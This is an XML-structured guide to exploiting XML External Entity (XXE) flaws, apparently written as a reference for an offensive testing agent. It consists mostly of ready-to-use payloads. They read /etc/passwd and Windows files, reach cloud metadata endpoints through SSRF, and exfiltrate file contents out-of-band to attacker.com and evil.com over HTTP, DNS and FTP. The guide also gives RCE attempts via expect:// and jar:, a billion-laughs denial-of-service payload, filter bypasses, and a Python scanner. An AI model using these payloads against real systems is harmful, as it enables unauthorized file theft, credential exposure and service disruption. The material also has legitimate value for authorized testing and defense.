<xxe_vulnerability_guide>
<title>XML EXTERNAL ENTITY (XXE) - ADVANCED EXPLOITATION</title>

<critical>XXE leads to file disclosure, SSRF, RCE, and DoS. Often found in APIs, file uploads, and document parsers.</critical>

<discovery_points>
- XML file uploads (docx, xlsx, svg, xml)
- SOAP endpoints
- REST APIs accepting XML
- SAML implementations
- RSS/Atom feeds
- XML configuration files
- WebDAV
- Office document processors
- SVG image uploads
- PDF generators with XML input
</discovery_points>

<basic_payloads>
<file_disclosure>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///c:/windows/win.ini">]>
<root>&xxe;</root>
</file_disclosure>

<ssrf_via_xxe>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">]>
<root>&xxe;</root>
</ssrf_via_xxe>

<blind_xxe_oob>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd"> %xxe;]>

evil.dtd:
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?x=%file;'>">
%eval;
%exfiltrate;
</blind_xxe_oob>
</basic_payloads>

<advanced_techniques>
<parameter_entities>
<!DOCTYPE foo [
  <!ENTITY % data SYSTEM "file:///etc/passwd">
  <!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://evil.com/?d=%data;'>">
  %param;
  %exfil;
]>
</parameter_entities>

<error_based_xxe>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % eval "<!ENTITY &#x25; error SYSTEM 'file:///nonexistent/%file;'>">
  %eval;
  %error;
]>
</error_based_xxe>

<xxe_in_attributes>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root attr="&xxe;"/>
</xxe_in_attributes>
</advanced_techniques>

<filter_bypasses>
<encoding_tricks>
- UTF-16: <?xml version="1.0" encoding="UTF-16"?>
- UTF-7: <?xml version="1.0" encoding="UTF-7"?>
- Base64 in CDATA: <![CDATA[base64_payload]]>
</encoding_tricks>

<protocol_variations>
- file:// → file:
- file:// → netdoc://
- http:// → https://
- Gopher: gopher://
- PHP wrappers: php://filter/convert.base64-encode/resource=/etc/passwd
</protocol_variations>

<doctype_variations>
<!doctype foo [
<!DoCtYpE foo [
<!DOCTYPE foo PUBLIC "Any" "http://evil.com/evil.dtd">
<!DOCTYPE foo SYSTEM "http://evil.com/evil.dtd">
</doctype_variations>
</filter_bypasses>

<specific_contexts>
<json_xxe>
{% raw %}{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}{% endraw %}
</json_xxe>

<soap_xxe>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
    <foo>&xxe;</foo>
  </soap:Body>
</soap:Envelope>
</soap_xxe>

<svg_xxe>
<svg xmlns="http://www.w3.org/2000/svg">
  <!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
  <text>&xxe;</text>
</svg>
</svg_xxe>

<docx_xlsx_xxe>
1. Unzip document
2. Edit document.xml or similar
3. Add XXE payload
4. Rezip and upload
</docx_xlsx_xxe>
</specific_contexts>

<blind_xxe_techniques>
<dns_exfiltration>
<!DOCTYPE foo [
  <!ENTITY % data SYSTEM "file:///etc/hostname">
  <!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'http://%data;.attacker.com/'>">
  %param;
  %exfil;
]>
</dns_exfiltration>

<ftp_exfiltration>
<!DOCTYPE foo [
  <!ENTITY % data SYSTEM "file:///etc/passwd">
  <!ENTITY % param "<!ENTITY &#x25; exfil SYSTEM 'ftp://attacker.com:2121/%data;'>">
  %param;
  %exfil;
]>
</ftp_exfiltration>

<php_wrappers>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<root>&xxe;</root>
</php_wrappers>
</blind_xxe_techniques>

<xxe_to_rce>
<expect_module>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "expect://id">]>
<root>&xxe;</root>
</expect_module>

<file_upload_lfi>
1. Upload malicious PHP via XXE
2. Include via LFI or direct access
</file_upload_lfi>

<java_specific>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "jar:file:///tmp/evil.jar!/evil.class">]>
</java_specific>
</xxe_to_rce>

<denial_of_service>
<billion_laughs>
<!DOCTYPE lolz [
  <!ENTITY lol "lol">
  <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;">
  <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;">
  <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;">
  <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;">
]>
<lolz>&lol5;</lolz>
</billion_laughs>

<external_dtd_dos>
<!DOCTYPE foo SYSTEM "http://slow-server.com/huge.dtd">
</external_dtd_dos>
</denial_of_service>

<modern_bypasses>
<xinclude>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
  <xi:include parse="text" href="file:///etc/passwd"/>
</root>
</xinclude>

<xslt>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/">
    <xsl:copy-of select="document('file:///etc/passwd')"/>
  </xsl:template>
</xsl:stylesheet>
</xslt>
</modern_bypasses>

<parser_specific>
<java>
- Supports jar: protocol
- External DTDs by default
- Parameter entities work
</java>

<dotnet>
- Supports file:// by default
- DTD processing varies by version
</dotnet>

<php>
- libxml2 based
- expect:// protocol with expect module
- php:// wrappers
</php>

<python>
- Default parsers often vulnerable
- lxml safer than xml.etree
</python>
</parser_specific>

<validation_testing>
<detection>
1. Basic entity test: &xxe;
2. External DTD: http://attacker.com/test.dtd
3. Parameter entity: %xxe;
4. Time-based: DTD with slow server
5. DNS lookup: http://test.attacker.com/
</detection>

<false_positives>
- Entity declared but not processed
- DTD loaded but entities blocked
- Output encoding preventing exploitation
- Limited file access (chroot/sandbox)
</false_positives>
</validation_testing>

<impact_demonstration>
1. Read sensitive files (/etc/passwd, web.config)
2. Cloud metadata access (AWS keys)
3. Internal network scanning (SSRF)
4. Data exfiltration proof
5. DoS demonstration
6. RCE if possible
</impact_demonstration>

<automation>
# XXE Scanner
def test_xxe(url, param):
    payloads = [
        '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
        '<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://attacker.com/"> %xxe;]><foo/>',
        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
    ]

    for payload in payloads:
        response = requests.post(url, data={param: payload})
        if 'root:' in response.text or check_callback():
            return f"XXE found with: {payload}"
</automation>

<pro_tips>
1. Try all protocols, not just file://
2. Use parameter entities for blind XXE
3. Chain with SSRF for cloud metadata
4. Test different encodings (UTF-16)
5. Don't forget JSON/SOAP contexts
6. XInclude when entities are blocked
7. Error messages reveal file paths
8. Monitor DNS for blind confirmation
9. Some parsers allow network access but not files
10. Modern frameworks disable XXE by default - check configs
</pro_tips>

<remember>XXE is about understanding parser behavior. Different parsers have different features and restrictions. Always test comprehensively and demonstrate maximum impact.</remember>
</xxe_vulnerability_guide>
